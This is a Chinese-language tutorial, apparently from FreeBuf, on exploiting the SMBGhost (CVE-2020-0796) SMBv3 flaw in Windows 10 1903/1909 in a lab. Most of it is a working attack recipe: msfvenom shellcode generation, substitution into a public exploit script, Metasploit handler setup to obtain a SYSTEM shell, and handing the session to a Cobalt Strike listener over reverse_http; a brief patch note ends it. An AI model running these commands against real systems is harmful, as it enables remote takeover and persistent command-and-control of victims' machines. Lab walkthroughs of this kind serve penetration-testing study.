SMBGhost_RCE漏洞利用(MSF和CS联动) – 作者:sixsix

漏洞描述

该漏洞是存在于SMB v3的远程代码执行漏洞,攻击者可以通过利用该漏洞,向存在漏洞的受害主机的SMB服务发送一个特殊构造的数据包即可远程执行任意代码,甚至是可以造成蠕虫攻击。攻击结果和永恒之蓝(MS17-010)相似,所以也被称为永恒之黑。

影响范围

Windows 10 Version 1903 (32-bit Systems)
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 (32-bit Systems)
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)

漏洞扫描

使用工具检测漏洞

下载地址:http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

使用方法:CVE-2020-0796-Scanner.exe 目标地址

检测到漏洞存在

image

漏洞利用

1、 生成反向连接木马:

运用msf中的木马生成模块

msfvenom -p windows/x64/meterpreter/bind\_tcp LPORT=1234 -b '\x00' -i 1 -f python

image.png

注意这里选正向连接,这是因为,微软提到 “要利用该漏洞攻击客户端,未认证攻击者需要配置一个恶意 SMBv3 服务器并说服用户与之连接。”这表示我们需要先向目标发起请求

2、 替换shellcode,将上面生成的代码替换原文中的代码

exp下载地址:https://github.com/chompie1337/SMBGhost_RCE_PoC

打开exploit.py

image.png

记得将buf替换回USER_PAYLOAD

image.png

3、启动Metasploit监听

payload正向监听(与exp中的payload保持一致),监听端口1234(与exp中的lport保持一致)

kali终端运行msf:msfconsole

use exploit/multi/handler #开启监听
set payload windows/x64/meterpreter/bind_tcp #设置payload,注意选正向
set lport 1234 #设置本地端口
set rhost 192.168.19.133 #设置目标地址(设置之前也可以调用nmap扫描一下测试网络连通性)

image.png

4、运行poc,自动建立连接

python3 exploit.py -ip 192.168.19.133

(攻击不稳定,需要多攻击几次才能成功,亲测powershell中执行似乎成功概率更大)

image.png

5、成功之后,在msf中 run,getshell且为system权限

image.png

6、开启CS

运行服务端,端口为50050

image.png

新开窗口,运行客户端,密码是服务端设置的密码,用户名可以任意

image

7、回到msf,输入background,将我们得到的会话放在后台

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lport 1233 #cobaltstrike监听的端口
set lhost 192.168.19.129 #cobaltstrike监听的ip
set disablepayloadhandler true #默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于我们已经有了一个,所以不需要在产生一个,所以这里我们设置为true
set session 1 #这里是获得的session的id

image.png

8、打开cs 开启监听,端口为1233,点击add添加监听

image

回到msf,输入run

image.png

成功得到会话,可以设置Sleep为1(默认得到命令结果回显的时间为60,比较久) 并且执行命令

image

漏洞修复

更新windows,安装官方补丁

补丁地址:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796

总结

总的下来,永恒之黑利用过程比较顺利,但这个漏洞相对来说利用范围不大,并且也不是很稳定,攻击需要试多次才能成功,特别是很容易试得目标机器蓝屏,但如果攻击成功的话也能得到最高权限,因此实际情况中,不是最糟糕的情况不建议通过这个漏洞得到权限,风险比较大

来源:freebuf.com 2021-06-16 23:53:58 by: sixsix

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论